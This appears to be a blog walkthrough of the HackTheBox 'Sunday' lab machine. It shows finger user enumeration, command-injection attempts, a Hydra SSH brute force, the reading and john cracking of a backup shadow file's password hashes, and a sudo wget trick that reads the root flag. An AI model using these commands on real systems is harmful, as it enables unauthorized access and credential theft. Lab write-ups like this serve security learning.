Sunday

Enumeration Stage

NMAP

There is a firewall that is filtering our requests. To bypass it I have ran the script with the displayed tags. The service scan reveals five open ports.

# nmap -p- 10.10.10.76 -sV -sC -T4 
PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
44060/tcp open  unknown
44273/tcp open  rpcbind
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

Port 79/tcp finger

Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user’s plan and project files.

This website(hacktricks.xyz) reveals really cool information on the service and ways to exploit it.

# finger [email protected]                                                                                    130 ⨯
Login       Name               TTY         Idle    When    Where
xvm      xVM User                           < .  .  .  . >
openldap OpenLDAP User                      < .  .  .  . >
nobody   NFS Anonymous Access               < .  .  .  . >
noaccess No Access User                     < .  .  .  . >
nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >
metasploit finger user enumeraion

We have already enumerated some users but it doesn’t hurt to try the metasploit module too. From the output we understand that there is a “sunny” and a mysql user too.

msf6 auxiliary(scanner/finger/finger_users) > run

[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: sunny
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: uucp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: nuucp
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: listen
[+] 10.10.10.76:79        - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79        - 10.10.10.76:79 Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp
[*] 10.10.10.76:79        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Command injection test

The command injection failed but I am putting it here for you to know that it may exist in other cases.

# finger "/bin/ls -a /@10.10.10.76"                                                                            1 ⨯
Login       Name               TTY         Idle    When    Where
/bin/ls               ???
-a                    ???
/                     ???

# finger "|[email protected]"         
Login       Name               TTY         Idle    When    Where
|ls                   ???

Port 111/tcp portmapper

In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on Solaris hosts) to identify RPC services that are open to direct attack.

You can run nmap with the -sR option to identify RPC services listening on high ports if the portmapper is inaccessible. Also, the -sR option is depricated and -sV runs instead.

Bruteforcing ssh service

Found password “sunday”.

# hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://10.10.10.76
[DATA] attacking ssh://10.10.10.76:22022/ [22022][ssh] host: 10.10.10.76 login: sunny password: sunday 1 of 1 target successfully completed, 1 valid password found

Privilege Escalation

Logging through ssh using sunny:sunday as username:password.

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p 22022                                   1 ⚙
Password: 
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
[email protected]:~$ 

Weird file

[email protected]:/tmp$ cat ogl_select253 
SUNWtext mesa
NVDAnvda nvidia

Path poison attempt. Upon logging in, I tried sudo -l and I see that /root/troll does not require password to run. Upon running my guess is that it invokes a system call “id”. Therefore I am creating a file /bin/bash with the name “id” and exporting the path to that file to be executed when invoked therefore root will run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.

[email protected]:/usr/share$ sudo -l                                                                                    
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

[email protected]:/usr/share$ sudo /root/troll
testing
uid=0(root) gid=0(root)

[email protected]:/tmp/$ cp /bin/bash /tmp/id
[email protected]:/tmp/$ chmod 777 id
[email protected]:/tmp/$ echo $PATH
/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin
[email protected]:/tmp/$ export PATH=/tmp:$PATH
[email protected]:/tmp/$ sudo /root/troll
testing
uid=0(root) gid=0(root)

I have discovered a backup shadow file containing sammy’s pass hash.

[email protected]:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

By using john, i have managed to extract the passwd from the hash. username:password == sammy:cooldude!

# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2
cooldude!        (sammy)

[deleted]
Session completed

Changing user to sammy. I once again tested the mandatory initial test “sudo -l” command and received a NOPASSWD for /usr/bin/wget. According to GTFO binaries we can escalate privileges by downloading our own file and saving it to our victim (such as shadow) or simply use wget to read out files.

[email protected]:/tmp$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
[email protected]:/tmp$ LFILE=/root/root.txt
[email protected]:/tmp$ sudo wget -i $LFILE
/root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme
No URLs found in /root/root.txt.
[email protected]:/tmp$

The system is quite interesting, it taught us about bypassing firewall rules, advanced nmap enumeration. The finger service and how we could extract usernames through it. We’re also introduced to some basic privesc with wget , cronjobs, path poisoning and others. We did some cracking on passwords with john, escalated to a 2nd user and then to root. Overly neat experience was provided to us. Peace!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: